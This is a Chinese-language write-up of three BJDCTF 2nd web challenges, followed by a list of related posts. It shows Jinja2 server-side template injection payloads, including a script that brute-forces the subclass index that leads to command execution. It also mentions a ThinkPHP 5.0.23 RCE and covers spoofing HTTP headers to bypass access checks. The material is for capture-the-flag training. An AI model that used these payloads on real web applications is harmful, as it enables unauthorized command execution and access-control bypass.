buuoj BJDCTF-2nd WP
复现地址:buuoj.cn
[BJDCTF 2nd]fake google
ssti的简单使用
打开复现地址是一个Google页面
随便搜索一下看了源码提示ssti
SSTI又叫服务端模板注入攻击
推荐先知师傅的一篇入门教程:https://xz.aliyun.com/t/3679
那就试试ssti能不能用吧,?name={{1-1}}
下面输出却是0,说明注入是可以的
列出基类,?name={{"".__class__.__base__}}
列出其子类,?name={{"".__class__.__base__.__subclasses__()}}
有这么多,我们需要查找到有os类的子类,可以看到确实有一个这样的类,现在就是找到他的下标,肯定不会一个一个数鸭哈哈,写个脚本(当然也能用bp爆破),在上一条payload的后面加上[]
就行,就像是找数组里面的值(?name={{"".__class__.__base__.__subclasses__()[110]}}
)
import requests
import timefor i in range(0,200):time.sleep(0.06)//赵师傅靶机有访问频率限制,所以加上sleepurl = 'http://6b31caef-86aa-49f5-b819-14ec6d3637e6.node3.buuoj.cn/qaq?name={{"".__class__.__base__.__subclasses__()[%s]}}'% i#print(url)res = requests.get(url)if 'os._wrap_close' in res.text:print(url)break
运行后得到os类在117位,然后初始化此类(?name={{"".__class__.__base__.__subclasses__()[117].__init__.__globals__}}
),用pepon执行命令,可以看到flag在根目录下,cat一下就出来了
[BJDCTF 2nd]old-hack
RCE的利用
开了靶机,黑客既视感
上面的THINKPHP5是一个php框架,用参数s引入一个不存在的模块爆出版本信息,然后去搜搜有没有漏洞hhh
直接搜5.0.23的RCE,flag在根目录下,cat一下就好
[BJDCTF 2nd]假猪套天下第
HTTP Header基础知识考察
这道题是Y1ng大师傅出的题,考的很基础
Y1ng师傅出题笔记:https://www.gem-love.com/ctf/2056.html#%E5%81%87%E7%8C%AA%E5%A5%97%E5%A4%A9%E4%B8%8B%E7%AC%AC%E4%B8%80
Y1ng推荐的HTTP Header 详解:https://www.cnblogs.com/jxl1996/p/10245958.html
admin弱口令登陆发现,但是用其他的账户随便输都能进去,进去后啥也没有,抓包看看
302跳转!,进去注释给的页面
没发现啥有用的,在抓包看看,cookie里面有个time参数,根据页面提示把他改到99年以后,又说我们不是来自本地的用户
用xff修改后(X-Forwarded-For:127.0.0.1直接加到repeater最下面就好),说我Too young too simple,那就换种方式,用Client-IP或者X-Real-IP;
然后提示访问要来自gem-love.com,用Referer:gem-love.com;
接着提示我们的浏览器不是Commodo 64,至于Commodo 64是什么自行搜索,然后用Commodore 64把UA头改了就行;
然后说邮箱不对,加上From:root@gem-love.com;
最后提示代理服务器需要是y1ng.vip,或者你可以py100一月hhh,加上via:y1ng.vip;
大功告成,解一下base64就好了
持续更新
buuoj BJDCTF-2nd WP相关推荐
- buuoj [BJDCTF 2nd]小姐姐-y1ng
strings xiaojiejie.jpeg |grep BJD
- [BJDCTF 2nd] Web复现 wp
文章目录 [BJDCTF 2nd] fake google [BJDCTF 2nd]old-hack [BJDCTF 2nd]假猪套天下第一 [BJDCTF 2nd]duangShell [BJDCT ...
- BJDCTF 2nd WEB
BJDCTF 2nd WEB emmm,比赛做了几道题,赛后官方给了wp,把没做出来的复现一下,,,, [BJDCTF 2nd]fake google 一个SSTI,发现是jinja2的,直接用pay ...
- [BUUCTF-pwn]——[BJDCTF 2nd]secret
[BUUCTF-pwn]--[BJDCTF 2nd]secret 这道题目,看就考验你的汇编能力了. 因为在反汇编的过程中,有一个函数过大,无法反汇编 在IDA中看到一个格外令人喜欢的东西,可是if ...
- [BUUCTF-pwn]——[BJDCTF 2nd]rci
[BUUCTF-pwn]--[BJDCTF 2nd]rci 题目地址: https://buuoj.cn/challenges#[BJDCTF%202nd]rci checksec 检查和 IDA大家 ...
- [BUUCTF-pwn]——[BJDCTF 2nd]ydsneedgirlfriend2
[BUUCTF-pwn]--[BJDCTF 2nd]ydsneedgirlfriend2 题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]ydsneedg ...
- [BUUCTF-pwn]——[BJDCTF 2nd]test
[BUUCTF-pwn]--[BJDCTF 2nd]test 题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]test 用户名是ctf , 密码是test ...
- [BUUCTF-pwn]——[BJDCTF 2nd]r2t3
[BUUCTF-pwn]--[BJDCTF 2nd]r2t3 题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]r2t3 题目: 先将文件下载下来,chec ...
- BJDCTF 2nd -Crypto
BJDCTF 2nd -Crypto cat_flag 在这里插入图片描述 思路 灵能精通-y1ng 题目 思路 燕言燕语-y1ng 题目 思路 Y1nglish-y1ng 题目 思路 cat_fla ...
- BJDCTF 2nd writeup(二)
文章目录 Misc [BJDCTF 2nd]A_Beautiful_Picture [BJDCTF 2nd]小姐姐-y1ng [BJDCTF 2nd]TARGZ-y1ng [BJDCTF 2nd]Im ...
最新文章
- 西北工业大学计算机网络实验报告2,西北工业大学《网络性能测试》实验报告...
- Docker安全加固——利用LXCFS增强docker容器隔离性和资源可见性
- react-router中离开确认组件Prompt
- numpy添加元素_科研速递 | 花费15年众望所归!NumPy论文终登上Nature!
- windows 2008 enterprise tcpip.sys问题总结。
- 自制快速冒烟测试小工具--基于python多线程(1)
- 每天一道LeetCode-----找出给定序列的所有子序列
- 深度学习领域有哪些瓶颈
- 目标检测第6步:YOLOv5(5.0)如何在Colab中训练自定义数据集?(更新时间:2022.3.22)
- python给视频添加声音_python 给视频加入音频
- 蚂蚁森林上线三周年,5亿人“手机种树”1.22亿棵...
- MySQL有sqldependency_SqlDependency的局限性是什么
- CoreImage的使用及常见滤镜工具(一)
- IT已成为最疯狂的加班行业,没有之一
- arcserver开发小结(三)
- mapgis67安装输入计算机名称,mapgis67_dogserver67.exe_mapgis67安装教程
- Android中实现微信分享的功能
- 【淘宝商品上架接口】为什么店铺流量访客很高,但是转化却非常的低
- 面向高稳定,高性能之-Hbase数据实时同步到ElasticSearch(之二)
- 360浏览器html位置,win7系统查看360浏览器收藏夹位置的操作方法